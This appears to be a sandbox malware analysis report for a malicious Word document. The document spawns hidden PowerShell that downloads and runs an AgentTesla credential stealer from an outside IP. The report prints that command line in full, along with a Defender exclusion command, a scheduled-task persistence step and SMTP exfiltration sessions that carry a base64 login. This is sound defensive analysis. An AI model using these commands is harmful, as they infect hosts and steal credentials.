Nov 25, 2021 18:16:56.586457014 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.586457014 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.586457014 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:16:56.586457014 CET  8.8.8.8    192.168.2.22  0xb7b1    No error (0)  us2.smtp.mailhostbox.com         208.91.199.224  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• 173.232.204.89

HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49165        173.232.204.89  80                C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp                            kBytes transferred  Direction  Data
Nov 25, 2021 18:14:53.977502108 CET  0                   OUT        GET /taskmg.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 173.232.204.89
Connection: Keep-Alive
Nov 25, 2021 18:14:54.124871969 CET  1                   IN         HTTP/1.1 200 OK
Server: nginx/1.19.9
Date: Thu, 25 Nov 2021 17:14:54 GMT
Content-Type: application/octet-stream
Content-Length: 777216
Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
Connection: keep-alive
ETag: "619f0842-bdc00"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 173.232.204.89 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 18:14:59.854968071 CET | 821 | OUT | GET /taskmg.exe HTTP/1.1
Host: 173.232.204.89
Connection: Keep-Alive
Nov 25, 2021 18:15:00.005897045 CET | 822 | IN | HTTP/1.1 200 OK
Server: nginx/1.19.9
Date: Thu, 25 Nov 2021 17:14:59 GMT
Content-Type: application/octet-stream
Content-Length: 777216
Last-Modified: Thu, 25 Nov 2021 03:51:30 GMT
Connection: keep-alive
ETag: "619f0842-bdc00"
Accept-Ranges: bytes


                                                                                                              SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 25, 2021 18:15:49.911569118 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:15:49.912316084 CET | 49167 | 587 | 192.168.2.22 | 208.91.199.224 | EHLO 141700
Nov 25, 2021 18:15:50.060368061 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:15:50.062571049 CET | 49167 | 587 | 192.168.2.22 | 208.91.199.224 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:15:50.211478949 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:15:50.364773989 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:15:50.365942955 CET | 49167 | 587 | 192.168.2.22 | 208.91.199.224 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:15:50.514678001 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:15:50.515450954 CET | 49167 | 587 | 192.168.2.22 | 208.91.199.224 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:15:50.675885916 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:15:50.676439047 CET | 49167 | 587 | 192.168.2.22 | 208.91.199.224 | DATA
Nov 25, 2021 18:15:50.825654030 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:15:51.866069078 CET | 587 | 49167 | 208.91.199.224 | 192.168.2.22 | 250 2.0.0 Ok: queued as 92DD13A1A86
Nov 25, 2021 18:16:00.303539991 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:00.303939104 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | EHLO 141700
Nov 25, 2021 18:16:00.456043005 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:16:00.456239939 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:16:00.609339952 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:16:00.764110088 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:16:00.764594078 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:00.918028116 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:16:00.918572903 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:01.078608990 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:16:01.079021931 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | DATA
Nov 25, 2021 18:16:01.231420994 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:16:02.157263994 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | .
Nov 25, 2021 18:16:02.454163074 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 250 2.0.0 Ok: queued as 00FA11D7F9C
Nov 25, 2021 18:16:12.105878115 CET | 49168 | 587 | 192.168.2.22 | 208.91.199.225 | QUIT
Nov 25, 2021 18:16:12.258209944 CET | 587 | 49168 | 208.91.199.225 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:16:12.800467968 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:12.800950050 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | EHLO 141700
Nov 25, 2021 18:16:12.952631950 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:16:12.952924013 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:16:13.106471062 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:16:13.261068106 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:16:13.261806011 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:13.414693117 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:16:13.415137053 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:13.579514980 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:16:13.580049038 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | DATA
Nov 25, 2021 18:16:13.732167006 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:16:15.341310978 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 250 2.0.0 Ok: queued as 7AAA4DA296
Nov 25, 2021 18:16:21.787130117 CET | 587 | 49170 | 208.91.199.224 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:47.266040087 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:47.266547918 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | EHLO 141700
Nov 25, 2021 18:16:47.411499023 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:16:47.412118912 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:16:47.557813883 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:16:47.708725929 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:16:47.709115028 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:47.857166052 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:16:47.857582092 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:48.021215916 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:16:48.021595001 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | DATA
Nov 25, 2021 18:16:48.166672945 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:16:49.666822910 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 250 2.0.0 Ok: queued as E66333A1B18
Nov 25, 2021 18:16:55.161237001 CET | 49172 | 587 | 192.168.2.22 | 208.91.199.224 | QUIT
Nov 25, 2021 18:16:55.306260109 CET | 587 | 49172 | 208.91.199.224 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:16:55.699424982 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:55.699944973 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | EHLO 141700
Nov 25, 2021 18:16:55.844575882 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:16:55.845048904 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:16:55.990134954 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:16:56.137636900 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:16:56.138192892 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:56.283674955 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:16:56.284219980 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:56.354336977 CET | 49169 | 587 | 192.168.2.22 | 208.91.199.223 | QUIT
Nov 25, 2021 18:16:56.464593887 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:16:56.465066910 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | DATA
Nov 25, 2021 18:16:56.506661892 CET | 587 | 49169 | 208.91.199.223 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:16:56.609827995 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:16:56.613157988 CET | 49173 | 587 | 192.168.2.22 | 208.91.199.224 | .
Nov 25, 2021 18:16:56.853490114 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 250 2.0.0 Ok: queued as 5A7EC3A1B1C
Nov 25, 2021 18:16:56.962841034 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:16:56.963052034 CET | 49174 | 587 | 192.168.2.22 | 208.91.198.143 | EHLO 141700
Nov 25, 2021 18:16:57.112601995 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
250-PIPELINING
250-SIZE 41648128
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
Nov 25, 2021 18:16:57.113282919 CET | 49174 | 587 | 192.168.2.22 | 208.91.198.143 | AUTH login bS1rb25pZWN6bnlAZXVyb3BlY2VsbC5ldQ==
Nov 25, 2021 18:16:57.263832092 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:16:57.416347027 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:16:57.416778088 CET | 49174 | 587 | 192.168.2.22 | 208.91.198.143 | MAIL FROM:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:57.567409992 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:16:57.568006992 CET | 49174 | 587 | 192.168.2.22 | 208.91.198.143 | RCPT TO:<m-konieczny@europecell.eu>
Nov 25, 2021 18:16:57.732752085 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:16:57.733259916 CET | 49174 | 587 | 192.168.2.22 | 208.91.198.143 | DATA
Nov 25, 2021 18:16:57.882982016 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:16:59.406790972 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as 9F9E878224E
Nov 25, 2021 18:16:59.774890900 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as 9F9E878224E

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 18:14:15
Start date: 25/11/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f670000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:14:20
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
Imagebase: 0x13f770000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.423965866.0000000000400000.00000004.00000020.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 18:14:21
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
Imagebase: 0x13f770000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.418266539.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 18:14:21
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
Imagebase: 0x13f770000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 18:14:26
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\taskmg.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\taskmg.exe"
Imagebase: 0x12d0000
File size: 777216 bytes
MD5 hash: 815982590DE5E574ABB8A0310826E200
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.446756970.000000000384A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:14:29
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
Imagebase: 0x22300000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 18:14:30
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
Imagebase: 0xde0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:14:34
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\taskmg.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\taskmg.exe
Imagebase: 0x12d0000
File size: 777216 bytes
MD5 hash: 815982590DE5E574ABB8A0310826E200
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443795246.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705042151.0000000002817000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442473841.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.442015388.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.704893314.00000000027A1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.704243058.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.443302064.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:14:39
Start date: 25/11/2021
Path: C:\Windows\System32\verclsid.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase: 0xffa10000
File size: 11776 bytes
MD5 hash: 3796AE13F680D9239210513EDA590E86
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 18:14:41
Start date: 25/11/2021
Path: C:\Windows\System32\notepad.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Imagebase: 0xffe30000
File size: 193536 bytes
MD5 hash: B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis